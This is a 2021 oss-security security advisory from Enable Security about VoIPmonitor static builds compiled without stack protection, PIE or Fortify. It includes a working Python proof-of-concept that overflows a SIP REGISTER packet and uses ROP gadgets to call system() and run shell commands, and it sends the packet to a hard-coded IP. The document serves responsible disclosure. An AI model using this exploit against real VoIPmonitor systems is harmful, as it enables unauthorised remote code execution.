List: oss-security
Subject: [oss-security] ES2021-04: VoIPmonitor static builds are compiled without any standard memory corruption protection
From: "Sandro Gauci" <sandro () enablesecurity ! com>
Date: 2021-03-15 12:50:26
Message-ID: e835517e-f199-4cae-a9cb-33c89a77c916 () www ! fastmail ! com
# VoIPmonitor static builds are compiled without any standard memory corruption protection
- Fixed versions: N/A
- Enable Security Advisory: https://github.com/EnableSecurity/advisories/tree/master/ES2021-04-voipmonitor-staticbuild-memory-corruption-protection
- VoIPmonitor Security Advisory: none
- Tested vulnerable versions: 27.5
- Timeline:
  - Report date: 2021-02-10 & 2021-02-13
  - Enable Security advisory: 2021-03-15
## Description
The binaries available for download at <https://www.voipmonitor.org/download> are built without any memory corruption protection in place. The following is output from the tool `hardening-check`:
```
hardening-check voipmonitor:
Position Independent Executable: no, normal executable!
Stack protected: no, not found!
Fortify Source functions: unknown, no protectable libc functions used
Read-only relocations: no, not found!
Immediate binding: no, not found!
Stack clash protection: unknown, no -fstack-clash-protection instructions found
Control flow integrity: unknown, no -fcf-protection instructions found!
```
When stack protection, Fortify Source and the other protection mechanisms listed above are in place, exploitation of a memory corruption vulnerability normally results in a program crash rather than remote code execution. Most modern build toolchains enable these features in the executables they produce by default. When these features are absent, attackers may easily exploit memory corruption vulnerabilities, such as buffer overflows, to run arbitrary code. In this advisory we demonstrate how a buffer overflow reported in a separate advisory could be abused to run arbitrary code because of the lack of standard memory corruption protection in the static build releases of VoIPmonitor.
The vendor has explained that:
> we are not going to enable the protection in the static builds as the speed is critical on many installations
>
> Our static build also uses tcmalloc (recommended version) which is required for high packet/second processing as the libc allocator is not fast enough especially on NUMA systems. For high packet/second traffic FORTIFY_SOURCE can introduce a lot of additional CPU cycles. If using custom builds with FORTIFY_SOURCE - they should compare if the sniffer did not introduce higher CPU usage.
While we understand the vendor's position, we are issuing an advisory to ensure that end users can make informed risk-based decisions.
## Impact
The lack of standard memory corruption protection mechanisms means that such vulnerabilities may lead to remote code execution.
## How to reproduce the issue
1. Execute the static build of VoIPmonitor (such as https://www.voipmonitor.org/current-stable-sniffer-static-64bit.tar.gz)
2. Start the live sniffer from the VoIPmonitor GUI or via the manager on port 5029
3. Execute the following Python program so that VoIPmonitor is able to capture the packet
4. Observe the payload being executed by the `voipmonitor` process, i.e. the following:
   - the current user is printed due to execution of the `whoami` command
   - `h4x0r was here` is also printed
   - a file has been created at `/tmp/woot`
```python
import struct
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
payload_size=32607
# Pad with As
payload = b'A' * 703
payload_size-=len(payload)
# Write system payload
cmd=b'whoami;echo "h4x0r was here";touch /tmp/woot\x00'
payload+=cmd
payload_size-=len(cmd)
# Pad some more so that we reach the return address of the save_packet_sql function
payload += b'A' * payload_size
# Call a ROP gadget that increments the value of the RDI register,
# which will then point to the value set by cmd
payload += struct.pack('<Q', 0x0000000000b222f1)
# Return to system() to execute the value in RDI
payload += struct.pack('<Q', 0xb22fd0)
# Return to exit() to exit gracefully
payload += struct.pack('<Q', 0xf60a20)
msg=b'REGISTER %s SIP/2.0\r\n' % (payload)
msg+=b'Via: SIP/2.0/UDP 192.168.1.132:35393;rport;branch=z9hG4bK-kwtTkrdNAO2Wvw0v\r\n'
msg+=b'Max-Forwards: 70\r\n'
msg+=b'From: <sip:85861710@demo.sipvicious.pro>;tag=mnq1nKGNZHNUkNOG\r\n'
msg+=b'To: <sip:85861710@demo.sipvicious.pro>\r\n'
msg+=b'Call-ID: 93X9dNZO2qdcfpdu\r\n'
msg+=b'CSeq: 1 REGISTER\r\n'
msg+=b'Contact: <sip:85861710@192.168.1.132:35393;transport=udp>\r\n'
msg+=b'Expires: 60\r\n'
msg+=b'Content-Length: 0\r\n'
msg+=b'\r\n'
s.sendto(msg, ('167.71.58.84', 5060))
```
## Solution and recommendations
Users who would like to have standard memory corruption protection for VoIPmonitor should compile the binaries themselves and apply their own upgrades rather than using the upgrade feature from the VoIPmonitor GUI / sensors page.
We recommended the following to the vendor:
> Our recommendation is that standard memory corruption protection be switched on by default in the official binary build of VoIPmonitor. If there are specific requirements for specific systems that require such features to be switched off, then additional binaries should be offered, with adequate documentation of the risks involved.
>
> Do note that memory corruption vulnerabilities should also be addressed and fixed even if security features, such as Fortify, are used.
## Acknowledgements
Enable Security would like to thank Martin Vit and the developers at VoIPmonitor for the very quick responses and explanations with regards to this security issue.
## About Enable Security
[Enable Security](https://www.enablesecurity.com) develops offensive security tools and provides quality penetration testing to help protect your real-time communications systems against attack.
## Disclaimer
The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
## Disclosure policy
This report is subject to Enable Security's vulnerability disclosure policy which can be found at <https://github.com/EnableSecurity/Vulnerability-Disclosure-Policy>.
--
Sandro Gauci, CEO at Enable Security GmbH
Register of Companies: AG Charlottenburg HRB 173016 B
Company HQ: Neuburger Straße 101 b, 94036 Passau, Germany
PGP/Encrypted comms: https://keybase.io/sandrogauci
Our blog: https://www.rtcsec.com
Other points of contact: https://enablesecurity.com/#contact-us